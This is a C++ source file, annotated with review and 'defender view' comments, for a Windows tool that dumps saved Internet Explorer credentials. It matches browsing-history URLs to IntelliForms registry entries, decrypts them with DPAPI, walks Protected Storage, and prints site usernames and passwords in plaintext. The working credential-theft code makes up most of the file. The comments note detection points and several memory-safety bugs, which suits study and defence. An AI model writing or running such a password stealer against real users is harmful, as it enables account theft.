- #include <windows.h>
- #include <UrlHist.h>
- #include <shlobj.h>
- #include <stdio.h>
- #include <wincrypt.h>
- #include <tchar.h>
// Sizing limits used below: EnumUrls keeps at most UrlHistoryNum history
// entries, and MAX_VALUE_NAME sizes the registry value-name and hash-string
// buffers in DecryptIEAutoCompletePwd.
- #define UrlHistoryNum 5000
- #define MAX_VALUE_NAME 1024
// MSVC-specific directive; presumably the source of the IPStorePtr /
// IEnumPStore*Ptr smart-pointer types used in EnumPStorage (no other
// declaration of them is visible in this listing).
- #import "pstorec.dll" no_namespace
- #pragma comment(lib, "Crypt32.lib")
// Forward declarations for the two passes that main() runs.
- void EnumPStorage();
- void DecryptIEAutoCompletePwd();
// Signature of the PStoreCreateInstance export, which EnumPStorage resolves at
// run time with GetProcAddress instead of linking against it.
- typedef HRESULT (WINAPI *FPPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD);
// Global table of lower-cased history URLs. EnumUrls fills it with new[]
// allocations; GetURLHashString and DecryptIEAutoCompletePwd index into it.
// No delete[] for these entries appears anywhere in this listing.
- WCHAR *URL[UrlHistoryNum];
// Entry point: runs the Protected Storage pass, then the IntelliForms
// (registry + DPAPI) pass. Takes no arguments; both passes write whatever they
// recover to stdout in plaintext. Always returns 0, so failures in either pass
// are not reflected in the exit code.
- int main()
- {
- EnumPStorage();
- DecryptIEAutoCompletePwd();
- return 0;
- }
// EnumUrls: copies up to UrlHistoryNum entries from the current user's IE URL
// history (IUrlHistoryStg2) into the global URL[] table.
//
// Each URL is cut at the first '?' and lower-cased before it is stored. The
// stored strings are what the rest of the listing hashes and passes to DPAPI,
// so only sites still present in the history can be matched later.
//
// Returns the number of loop iterations completed (0 if the COM object or the
// enumerator could not be obtained).
//
// NOTE(review): the return type is int while the counter is a DWORD.
// NOTE(review): when pwcsUrl is NULL the slot URL[idx] is left untouched (NULL
// for this zero-initialised global) but idx still advances; later callers run
// wcslen() on every slot below the returned count.
// NOTE(review): the strings returned in STATURL are not released here
// (CoTaskMemFree is never called) -- confirm against the IEnumSTATURL contract.
- int EnumUrls()
- {
- IUrlHistoryStg2* pUrlHistoryStg2 = NULL;
- HRESULT hRes;
- DWORD idx = 0;
// Return value of CoInitialize is not checked.
- CoInitialize(NULL);
- hRes = CoCreateInstance(CLSID_CUrlHistory, NULL, CLSCTX_INPROC_SERVER, IID_IUrlHistoryStg2, (void **)&pUrlHistoryStg2);
- if (!FAILED(hRes))
- {
- IEnumSTATURL* pEnumURL;
- hRes = pUrlHistoryStg2->EnumUrls(&pEnumURL);
- if (!FAILED(hRes))
- {
- STATURL suURL;
- DWORD pceltFetched;
- suURL.cbSize = sizeof(suURL);
// Stops at the table capacity or at the first Next() result other than S_OK.
- for (idx = 0; (idx < UrlHistoryNum) && (pEnumURL->Next(1, &suURL, &pceltFetched) == S_OK); ++idx)
- {
- if (suURL.pwcsUrl != NULL)
- {
- WCHAR *p = NULL;
// dwLen is a byte count (2 bytes per WCHAR, terminator included), taken
// before the query string is cut off. It is then used as an element count
// for new[] and wcscpy_s, so the buffer is larger than needed, never smaller.
- DWORD dwLen = 2 * (wcslen(suURL.pwcsUrl) + 1);
// Drop the query string in place.
- if ((p = wcschr(suURL.pwcsUrl, '?')) != NULL)
- *p = 0;
- URL[idx] = new WCHAR[dwLen];
// Lower-case the enumerator's buffer in place, then copy it out.
- _wcslwr_s(suURL.pwcsUrl, wcslen(suURL.pwcsUrl) + 1);
- wcscpy_s(URL[idx], dwLen, suURL.pwcsUrl);
- }
- }
- pEnumURL->Release();
- }
- pUrlHistoryStg2->Release();
- }
- CoUninitialize();
- return idx;
- }
// GetURLHashString: writes the lookup name for URL[idx] into szHash.
//
// The name is the SHA-1 of the URL's wide-character bytes (terminating NUL
// included) as 40 upper-case hex digits, followed by two more hex digits
// holding the 8-bit sum of the 20 hash bytes. DecryptIEAutoCompletePwd compares
// this string against the value names under IntelliForms\Storage2.
//
// Parameters:
//   idx    - index into the global URL[] table.
//   szHash - output buffer; set to the empty string first, so it stays empty
//            if any CryptoAPI call fails.
//   dwLen  - never read. The code writes 42 characters plus a terminator
//            regardless, so the caller must supply at least 43 TCHARs.
//
// NOTE(review): URL[idx] is passed to wcslen() without a NULL check; see the
// unset-slot case in EnumUrls.
- void GetURLHashString(DWORD idx, TCHAR *szHash, DWORD dwLen)
- {
- *szHash = 0;
- HCRYPTPROV hProv = NULL;
- HCRYPTHASH hHash = NULL;
// CRYPT_VERIFYCONTEXT: the provider is used for hashing only, no key container.
- if (CryptAcquireContext(&hProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
- {
- if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
- {
// Hash length is in bytes and includes the two-byte terminator.
- if (CryptHashData(hHash, (BYTE *)(URL[idx]), 2 * (wcslen(URL[idx]) + 1), 0))
- {
- DWORD dwHashLen = 20;
- BYTE Buffer[20];
- if (CryptGetHashParam(hHash, HP_HASHVAL, Buffer, &dwHashLen, 0))
- {
- DWORD i;
// tail is a BYTE, so the running sum wraps modulo 256.
- BYTE tail = 0;
- for (i = 0; i < 20; ++i)
- {
- tail += Buffer[i];
- wsprintf(szHash + 2 * i, TEXT("%02X"), Buffer[i]);
- }
// i == 20 here: the checksum byte lands at character offset 40.
- wsprintf(szHash + 2 * i, TEXT("%02X"), tail);
- }
- }
- CryptDestroyHash(hHash);
- }
- CryptReleaseContext(hProv, 0);
- }
- }
// DecryptIEAutoCompletePwd: recovers saved IE form credentials for the current
// user and prints them to stdout in plaintext.
//
// Flow, as visible below:
//   1. EnumUrls() fills URL[] from the browsing history.
//   2. Every value name under
//      HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 is
//      compared with the hash string of each history URL.
//   3. On a match the value data is passed to CryptUnprotectData with the
//      URL's wide-character bytes (terminator included) as optional entropy.
//   4. The decrypted blob is parsed as a header followed by 16-byte entries
//      whose first DWORD is an offset to a wide string; strings are printed in
//      username/password pairs.
//
// Defender view: the observable behaviour is a non-browser process opening the
// IntelliForms\Storage2 key with KEY_QUERY_VALUE and calling CryptUnprotectData
// on its values. The blob is only protected by the URL and the user's DPAPI
// context, so presumably any code running as that user can do the same --
// registry auditing on this key is the natural monitoring point (confirm
// against your telemetry).
//
// NOTE(review): decrypted data is never wiped before LocalFree, and several
// paths below leak or read out of bounds; they are marked inline.
- void DecryptIEAutoCompletePwd()
- {
- TCHAR szIEStorageKey[] = TEXT("Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2");
- TCHAR szUrlHash[MAX_VALUE_NAME];
- HKEY hKey;
- TCHAR achValue[MAX_VALUE_NAME];
- DWORD cchValue = MAX_VALUE_NAME;
- DWORD dwUrl;
- DWORD i = 0, j = 0;
- DWORD dwType;
- DWORD BufferLength;
- BYTE *Buffer;
- dwUrl = EnumUrls();
- if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_CURRENT_USER, szIEStorageKey, 0, KEY_QUERY_VALUE, &hKey))
- return;
// Only ERROR_NO_MORE_ITEMS ends the loop; any other error still runs the body
// with whatever achValue holds from the previous iteration.
- while (ERROR_NO_MORE_ITEMS != RegEnumValue(hKey, i, achValue, &cchValue, NULL, NULL, NULL, NULL))
- {
// The hash of every history URL is recomputed for every registry value.
- for (j = 0; j < dwUrl; ++j)
- {
// sizeof() is a byte count here; GetURLHashString ignores the argument anyway.
- GetURLHashString(j, szUrlHash, sizeof(szUrlHash));
- if (lstrcmp(szUrlHash, achValue) == 0)
- {
// Size query; its return value is not checked, so BufferLength may be
// uninitialised when it is used for the allocation.
- RegQueryValueEx(hKey, achValue, 0, &dwType, 0, &BufferLength);
- Buffer = new BYTE[BufferLength];
- if (RegQueryValueEx(hKey, achValue, 0, &dwType, Buffer, &BufferLength) == ERROR_SUCCESS)
- {
- DATA_BLOB DataIn;
- DATA_BLOB DataOut;
- DATA_BLOB OptionalEntropy;
- DataIn.pbData = Buffer;
- DataIn.cbData = BufferLength;
// Entropy is the lower-cased, query-stripped URL including its terminator.
- OptionalEntropy.pbData = (BYTE *)URL[j];
- OptionalEntropy.cbData = 2 * (wcslen(URL[j]) + 1);
// Flags value 1 presumably corresponds to CRYPTPROTECT_UI_FORBIDDEN -- confirm.
- if (CryptUnprotectData(&DataIn, 0, &OptionalEntropy, NULL, NULL, 1, &DataOut))
- {
// Layout as read by this code: DWORD at +0 = header size, +4 = size of the
// entry table, +20 = string count (halved to get pairs), entries from +36,
// string data after header + entry table.
// NOTE(review): these reads happen before the cbData < 36 check below.
- DWORD dwHeaderSize = *((LPDWORD)(DataOut.pbData));
- DWORD dwSecretInfoSize = *((LPDWORD)(DataOut.pbData + 4));
- DWORD dwTotalSecrects = *((LPDWORD)(DataOut.pbData + 20)) / 2;
- LPBYTE lpSection = DataOut.pbData + 36;
- LPBYTE lpData = DataOut.pbData + dwHeaderSize + dwSecretInfoSize;
// NOTE(review): this continue resumes the for-j loop, skipping LocalFree,
// delete[] Buffer and the break, so both buffers leak on this path.
- if (DataOut.cbData < 36)
- continue;
// NOTE(review): neither the count nor the per-entry offsets are checked
// against DataOut.cbData before being dereferenced.
- while(dwTotalSecrects--)
- {
- WCHAR *wstrUserName, *wstrPassword;
- wstrUserName = (WCHAR *)(lpData + *((LPDWORD)lpSection));
- lpSection += 16;
- wstrPassword = (WCHAR *)(lpData + *((LPDWORD)lpSection));
// Plaintext credentials are written to stdout.
- printf("%S:\n{\n\tUsername: %S\n\tPassword: %S\n}\n", URL[j], wstrUserName, wstrPassword);
- lpSection += 16;
- }
- LocalFree(DataOut.pbData);
- }
- }
- delete []Buffer;
// First matching URL wins; move on to the next registry value.
- break;
- }
- }
- i++;
// RegEnumValue overwrites cchValue with the name length, so reset it.
- cchValue = MAX_VALUE_NAME;
- }
- RegCloseKey(hKey);
- }
// EnumPStorage: walks the legacy Protected Storage (PStore) hierarchy
// type -> subtype -> item, reads every item, and prints the entries belonging
// to two type GUIDs (labelled below as IE password-protected sites and IE
// AutoComplete). A third branch parses MSN data but never prints it.
//
// Types are recognised by comparing the hex text in szItemGUID with fixed
// strings; the output goes to stdout in plaintext.
//
// Defender view: the observable behaviour is a run-time LoadLibrary of
// pstorec.dll, a GetProcAddress for PStoreCreateInstance, and ReadItem calls
// across every type and subtype from a process that is not the owning
// application.
//
// NOTE(review): none of LoadLibrary, GetProcAddress, PStoreCreateInstance,
// EnumSubtypes, EnumItems or ReadItem is checked before its result is used, and
// the fixed-size buffers below are written without length checks. The buffers
// returned by raw_Next/ReadItem (itemName, lpString) are never freed, and
// hModule is never released with FreeLibrary.
- void EnumPStorage()
- {
- IPStorePtr PStore;
- IEnumPStoreTypesPtr EnumPStoreTypes;
- FPPStoreCreateInstance fpPStoreCreateInstance;
- HMODULE hModule = LoadLibrary(TEXT("pstorec.dll"));
// If the DLL or export is missing, the next call goes through a NULL pointer.
- fpPStoreCreateInstance = (FPPStoreCreateInstance)GetProcAddress(hModule, "PStoreCreateInstance");
- fpPStoreCreateInstance(&PStore, 0, 0, 0);
- HRESULT hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes);
- if (!FAILED(hRes))
- {
- GUID TypeGUID;
- TCHAR szItemGUID[50];
- TCHAR szItemName[512];
- TCHAR szItemData[512];
- while (EnumPStoreTypes->raw_Next(1, &TypeGUID, 0) == S_OK)
- {
- IEnumPStoreTypesPtr EnumPStoreSubTypes;
- GUID SubTypeGUID;
// A whole GUID struct is passed to a single %x; presumably only its first
// DWORD ends up in the text, which is what the 8-digit comparisons below expect.
- wsprintf(szItemGUID, TEXT("%x"), TypeGUID);
- PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumPStoreSubTypes);
- while (EnumPStoreSubTypes->raw_Next(1, &SubTypeGUID, 0) == S_OK)
- {
- IEnumPStoreItemsPtr spEnumItems;
- LPWSTR itemName;
- PStore->EnumItems(0, &TypeGUID, &SubTypeGUID, 0, &spEnumItems);
- while (spEnumItems->raw_Next(1, &itemName, 0) == S_OK)
- {
- DWORD cbData = 0;
- unsigned char *lpString = NULL;
// checkingData is not initialised; some paths below print it without writing it.
- TCHAR checkingData[200];
- _PST_PROMPTINFO *lPSTInfo = NULL;
- wsprintf(szItemName, TEXT("%ws"), itemName);
// If ReadItem fails, lpString stays NULL and the strlen below dereferences it.
- PStore->ReadItem(0, &TypeGUID, &SubTypeGUID, itemName, &cbData, &lpString, lPSTInfo, 0);
// Heuristic: a NUL byte well before cbData means the data is treated as
// 2-byte characters; otherwise it is formatted as one string.
- if (strlen((char *)lpString) < cbData - 1)
- {
- DWORD i = 0, j = 0;
// Keeps every second byte and turns embedded terminators into commas.
// NOTE(review): j is not bounded by the 512-element szItemData.
- for (i = 0; i < cbData; i += 2, ++j)
- {
- if (lpString[i] == 0)
- szItemData[j] = ',';
- else
- szItemData[j] = lpString[i];
- }
// Replaces the last written character; j is 0 when cbData is 0.
- szItemData[j - 1] = 0;
- }
- else
- wsprintf(szItemData, TEXT("%s"), lpString);
// The result of this comparison is discarded; the statement has no effect.
- lstrcmp(szItemGUID, TEXT("220d5cc1"));
- // IE:Password-Protected sites
- if (lstrcmp(szItemGUID, TEXT("5e7e8100")) == 0)
- {
// Split "name:secret" at the first ':' into szItemData and checkingData.
- if (_tcsstr(szItemData, TEXT(":")) != 0)
- {
- lstrcpy(checkingData, _tcsstr(szItemData, TEXT(":")) + 1);
- *(_tcsstr(szItemData, TEXT(":"))) = 0;
- }
// NOTE(review): %ws is paired with a narrow literal and %s with a TCHAR
// buffer; checkingData is uninitialised when no ':' was found.
- printf("%-50ws %-20ws %-15s %-15ws\n", szItemName, "PW-protected sites", szItemData, checkingData);
- }
- // msn
- if (lstrcmp(szItemGUID, TEXT("b9819c52")) == 0)
- {
- TCHAR msnid[100];
- TCHAR msnpass[100];
- DWORD i = 0, j = 0;
// Rebuilds szItemData from the raw bytes, keeping only alphanumerics and
// '@', '.', '_' and mapping zero bytes to commas.
- for (i = 0; i < cbData; i += 2)
- {
- if (lpString[i] == 0)
- {
- szItemData[j] = ',';
- ++j;
- }
- else
- {
- if (IsCharAlphaNumeric(lpString[i]) || lpString[i] == '@' || lpString[i] == '.' || lpString[i] == '_')
- {
- szItemData[j] = lpString[i];
- ++j;
- }
- }
- }
- szItemData[j - 1] = 0;
- TCHAR *p = szItemData +2;
// Loop count comes from byte 4 of the raw data. msnid and msnpass are
// filled in but never printed or returned.
// NOTE(review): msnpass is read below even when no ',' was found to fill it,
// and the _tcsstr result used to advance p is not checked for NULL.
- for (i = 0; i < lpString[4]; ++i)
- {
- lstrcpy(msnid, p + 1);
- if (_tcsstr(msnid, TEXT(",")) != 0)
- *(_tcsstr(msnid, TEXT(","))) = 0;
- if (_tcsstr(p + 1, TEXT(",")) != 0)
- lstrcpy(msnpass, (_tcsstr(p + 1, TEXT(","))) + 2);
- if (_tcsstr(msnpass, TEXT(",")) != 0)
- *(_tcsstr(msnpass, TEXT(","))) = 0;
- // The binary code is wrong here
- p = _tcsstr(p + 1, TEXT(",")) + lstrlen(msnpass) + 9;
- }
- }
- // IE
- if (lstrcmp(szItemGUID, TEXT("e161255a")) == 0)
- {
// Items whose name contains "StringIndex" are skipped.
- if (_tcsstr(szItemName, TEXT("StringIndex")) == 0)
- {
// Strip the ":String" suffix so the item name is the bare URL.
- if (_tcsstr(szItemName, TEXT(":String")) != 0)
- *(_tcsstr(szItemName, TEXT(":String"))) = 0;
// Only names whose first 7 characters contain "http:/" or "https:/" are printed.
- lstrcpyn(checkingData, szItemName, 8);
- if (_tcsstr(checkingData, TEXT("http:/")) == 0 && _tcsstr(checkingData, TEXT("https:/")) == 0)
- {
- // Nothing
- }
- else
- {
// Split the data at the first ',' into szItemData and checkingData.
- lstrcpy(checkingData, szItemData);
- if (_tcsstr(checkingData, TEXT(",")) != 0)
- {
- lstrcpy(checkingData, _tcsstr(szItemData, TEXT(",")) + 1);
- *(_tcsstr(szItemData, TEXT(","))) = 0;
- }
- printf("%-50ws %-20ws %-15ws %-15ws\n", szItemName, TEXT("Auto complete"), szItemData, checkingData);
- }
- }
- }
// Clears the shared name/data buffers before the next item; checkingData
// and the buffer behind lpString are left as they are.
- ZeroMemory(szItemName, sizeof(szItemName));
- ZeroMemory(szItemData, sizeof(szItemData));
- }
- //if (spEnumItems != NULL)
- //spEnumItems->Release();
- }
- //if (EnumPStoreSubTypes != NULL)
- //EnumPStoreSubTypes->Release();
- }
- //if (EnumPStoreTypes != NULL)
- //EnumPStoreTypes->Release();
- }
- //if (PStore != NULL)
- //PStore->Release();
- }